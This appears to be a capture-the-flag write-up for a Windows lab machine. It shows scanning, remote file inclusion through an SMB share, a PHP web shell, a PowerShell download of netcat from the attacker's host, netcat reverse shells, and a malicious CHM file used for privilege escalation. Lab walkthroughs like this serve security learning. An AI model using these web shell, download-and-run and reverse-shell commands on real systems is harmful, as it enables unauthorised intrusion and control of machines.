
In this article you well learn the following:
- Scanning targets using nmap
- Enumerate windows machine
- RFI via smb shared folder
- Switch user via powershell
- Exploit microsoft compiled HTML help
Starting with namp scan:
[box type=”shadow” align=”” class=”” width=””]
nmap -Pn -v -sC -sV -oN sniper.nmap 10.10.10.151
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows[/box]
Enumeration web directory:
[box type=”shadow” align=”” class=”” width=””]gobuster dir -u http://10.10.10.151/ -w /usr/share/wordlists/dirb/common.txt
/blog (Status: 301)
/Blog (Status: 301)
/css (Status: 301)
/Images (Status: 301)
/images (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/user (Status: 301)[/box]
After Enumeration I saw there’s get parameter in /blog for lang for get a page with specific lang.
http://10.10.10.151/blog/?lang=blog-fr.php
It’s seems to be LFI/RFI exploit.
I start to exploit it LFI attack with no success , and after an hour of research I found there’s
technique for RFI via SMB shared folder
https://medium.com/@minimalist.ascent/remote-file-include-using-samba-shares-6fa76dfeb4ce
Creating an SMB Shared Folder need some steps
First I edit smb.conf in /etc/samba
Second step:
$ mkdir Shell
$ chmod -R 777 Shell/
$ touch cmd.php
In cmd.php:
[box type=”shadow” align=”” class=”” width=””]
<?php
system($_GET[‘cmd’]);
?>
[/box]
Then start smb and nmb deamons with:
$ service smbd start
$ service nmbd start
After that, I browsed my shell and executed the following commands :
$ dir c:\
$ mkdir C:\m
$ powershell.exe -ep bypass -nop -command “iwr -uri http://10.10.14.43/
nc64.exe -outfile C:\m\nc64.exe”
$ C:\m\nc64.exe 10.10.14.43 9091 -e powershell.exe
Then I got reverse shell to the machine:
After some enumeration I found db.php ( database connection string ) :
There’s a weird comment , it’s seems the password not for database user , I got the
users in the machine and tried Credentialed Scan on it using smb service with Chris
user.
And it’s a valid creds for Chris User
I this case I have a valid creds for another user and reverse shell with iuser , I decided to
write a script to switching user from iuser to Chris , there’s a good way in powershell
using pscredential
After running the script I got a reverse shell.
And I got User flag
Privilage Escalation:
I run $ whoami /all to check user permissions and groups
After some manual enumeration I decided to run tree command in Chris folder , and I
found instructions.chm file in Download folder.
I move the file to my machine via netcat ( working in cmd.exe this symbol “ < “ )
And I got the file type it’s ( MS Windows HtmlHelp Data )
to read .chm files in linux, I used kchmreader application:
After few minuts i found another interesting file ( notes.txt ) in c:\Docs
After reading this I decided to create CHM payload and drop it in Docs
Generating CHM file Done
[box type=”shadow” align=”” class=”” width=””]$ Download Out-CHM.ps1 $ Import-Module .\Out-CHM.ps1 $ Command: Out-Chm -Payload “C:\m\nc64.exe 10.10.14.43 9098 -e powershell.exe” -HHCPath “C:\Program File (x86)\HTML Help Workshop”[/box]
After i generate .chm payload i upload it to Docs folder and setup listener and I received a
reverse connection from the machine
And I got the root flag.
That’s all folks , hope you enjoyed this writeup.